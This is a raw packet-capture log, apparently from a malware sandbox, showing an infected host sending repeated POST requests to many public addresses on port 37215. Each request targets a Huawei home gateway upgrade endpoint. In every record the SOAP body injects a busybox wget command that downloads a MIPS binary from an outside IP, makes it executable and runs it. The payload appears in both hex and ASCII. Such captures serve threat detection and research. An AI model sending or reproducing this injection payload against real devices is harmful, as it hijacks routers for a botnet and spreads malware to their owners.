                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            685192.168.2.134428441.231.143.22837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.648657084 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            686192.168.2.134450441.61.237.2437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.649435043 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            687192.168.2.1336866197.35.156.2837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.650126934 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            688192.168.2.1342044197.254.128.16837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.650836945 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            689192.168.2.1345096197.64.191.16537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.651590109 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            690192.168.2.1335332197.92.239.15137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.652272940 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            691192.168.2.135729641.208.114.19937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.653315067 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            692192.168.2.133880041.58.235.12937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.653727055 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            693192.168.2.1354110197.149.108.20637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.654412985 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            694192.168.2.134812641.138.83.21237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.655152082 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
